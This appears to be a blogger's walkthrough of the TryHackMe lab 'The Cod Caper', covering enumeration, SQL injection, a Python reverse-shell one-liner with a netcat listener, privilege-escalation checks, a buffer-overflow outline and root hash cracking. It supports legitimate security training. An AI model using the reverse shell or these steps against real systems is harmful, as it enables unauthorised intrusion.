Tryhackme:The Cod Caper

Intro:

Hello there my name is Pingu. I’ve come here to put in a request to get my fish back! My dad recently banned me from eating fish, as I wasn’t eating my vegetables. He locked all the fish in a chest, and hid the key on my old pc, that he recently repurposed into a server. As all penguins are natural experts in penetration testing, I figured I could get the key myself! Unfortunately he banned every IP from Antarctica, so I am unable to do anything to the server. Therefore I call upon you my dear ally to help me get my fish back! Naturally I’ll be guiding you through the process.

  1. Help me out! :)

Host Enumeration:

The first step is to see what ports and services are running on the target machine.

Useful flags:

-p=Used to specify which port to analyze, can also be used to specify a range of ports i.e -p 1-1000

Web Enumeration:

Since the only services running are SSH and Apache, it is safe to assume that we should check out the web server first for possible vulnerabilities. One of the first things to do is to see what pages are available to access on the web server.

Useful flags:

  • x=Used to specify file extensions i.e “php,txt,html”
    — url=Used to specify which url to enumerate
    — wordlist=Used to specify which wordlist that is appended on the url path

Web Exploitation:

The admin page seems to give us a login form. In situations like this it is always worth it to check for “low-hanging fruit”. In the case of login forms one of the first things to check for is SQL Injection.

  1. What is the admin username?

Command Execution:

It seems we have gained the ability to run commands! Since this is my old PC, I should still have a user account! Let’s run a few test commands, and then try to gain access!

  1. How many files are in the current directory?
nc -nvlp 80
python2 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP_ADDRES",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

LinEnum:

LinEnum is a bash script that searches for possible ways to priv esc. It is incredibly popular due to the sheer amount of possible methods that it checks for, and often times Linenum is one of the first things to try when you get shell access.

Method 1: SCP

Since you have ssh access on the machine you can use SCP to copy files over. In the case of Linenum you would run scp {path to linenum} {user}@{host}:{path}. Example: scp /opt/LinEnum.sh pingu@10.10.10.10:/tmp
would put LinEnum in /tmp.

Method 2: SimpleHTTPServer

SimpleHTTPServer is a module that hosts a basic webserver on your host machine. Assuming the machine you compromised has a way to remotely download files, you can host LinEnum and download it.

scp LinEnum.sh pingu@cod:/tmp
chmod +x LinEnum.sh
/LinEnum.sh
find / -perm -u=s -type f 2>/dev/null

pwndbg:

Luckily for us I was able to snag a copy of the source code from my dad’s flash drive

Binary-Exploitaion: Manually:

Previously we figured out that we need to provide 44 characters of input, and then we can execute whatever part of the program we want. Now the next step is to find out exactly where the shell function is in memory so we know what to set EIP to. GDB supports this as well with the disassemble command. Type disassemble shell, and this should pop up.

Binary Exploitation: The pwntools way:

Pwntools is a python library dedicated to making everything we just did in the last task much simpler. However, since it is a library, it requires python knowledge to use to it’s full potential, and as such everything in this task will be done using a python script.

Finishing the job:

Now that we have the password hashes, we can crack them and get the root password! Recall from the previous outputs that our root password hash is “$6$rFK4s/vE$zkh2/RBiRZ746OW3/Q/zqTRVfrfYJfFjFc2/q.oYtoF1KglS3YWoExtT3cvA3ml9UtDS8PFzCk902AsWx00Ck.".

Thankyou:

Now that I have the root password, I can get any fish he attempts to hide from me :).

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
jagadeesh

jagadeesh

CTF-PLAYER, security analyst, Pentesting, vapt, digital forensics